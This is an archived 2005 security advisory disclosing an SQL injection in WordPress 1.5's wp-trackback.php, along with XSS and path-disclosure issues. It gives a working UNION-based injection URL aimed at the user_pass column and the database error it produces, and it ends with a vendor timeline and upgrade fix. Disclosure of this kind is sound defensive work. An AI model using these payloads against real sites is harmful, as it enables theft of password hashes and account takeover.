wordpress15sql.txt

2005-08-14T00:00:00
ID PACKETSTORM:39288
Type packetstorm
Reporter Thomas Waldegger
Modified 2005-08-14T00:00:00

Description

                                        
                                            `  
  
---------------------------------------------------  
| BuHa Security-Advisory #1 | May 17th, 2005 |  
---------------------------------------------------  
| Vendor | Wordpress |  
| URL | http://wordpress.org/ |  
| Version | <= Wordpress 1.5 |  
| Risk | Moderate (SQL-Injection) |  
---------------------------------------------------  
  
o Description:  
=============  
  
WordPress is a state-of-the-art semantic personal publishing platform  
with a focus on aesthetics, web standards, and usability.   
  
Visit http://wordpress.org/ for detailed information.  
  
o SQL-Injection:  
===============  
  
The most critical vulnerability in the 1.5 release of wordpress is an  
SQL-Injection in `wp-trackback.php'. It's not easily exploitable  
because you do not get a result when you inject a valid query but it's  
possible to bruteforce values in the tables - for example the password  
hashes.  
  
Here some details:  
The parameter `tb_id' in `wp-trackback.php' is not validated correctly  
and there are no quotes in the SQL-query so an attacker is able to   
insert sql commands.  
  
$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts  
WHERE ID = $tb_id");  
  
Example: (I converted the POST-request into a GET-request.)  
  
> $tb_id = 1 union select user_pass,0 from wp_users  
> $url = bla  
> $title = bla  
  
</wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20  
wp_users&url=bla&title=bla>  
  
By injecting this query I get following databae error:  
  
> WordPress database error:  
> [The used SELECT statements have a different number of columns]  
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,   
> user_pass from wp_users  
  
When I insert "1 union select user_pass from wp_users" as value for  
`tb_id' I get no error message because the query was well-formed -  
logical. Through the possibility to insert any sql-command it's  
possible to 'reconstruct' values of the tables.  
  
o XSS:  
=====  
  
</wp-admin/edit.php?s=[XSS]&submit=Search>  
</wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]>  
  
o Path Disclosure:  
=================  
  
</wordpress-1.5-strayhorn/wp-content/themes/*>  
</wordpress-1.5-strayhorn/wp-includes/*>  
</wordpress-1.5-strayhorn/wp-admin/*>  
  
> Fatal error: Call to undefined function add_filter() in  
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/  
> wp-content/themes/classic/comments-popup.php on line 3  
  
o Disclosure Timeline:  
=====================  
  
17 Apr 05 - Security flaws discovered.  
19 Apr 05 - Vendor contacted.  
10 May 05 - Vendor released bugfixed version.  
17 May 05 - Public release.  
  
o Solution:  
==========  
  
Upgrade to wordpress 1.5.1 [1]  
  
o Credits:  
=========  
  
Thomas Waldegger <bugtraq@morph3us.org>  
BuHa-Security Community - http://buha.info/board/  
  
[1] http://wordpress.org/development/2005/05/one-five-one/  
`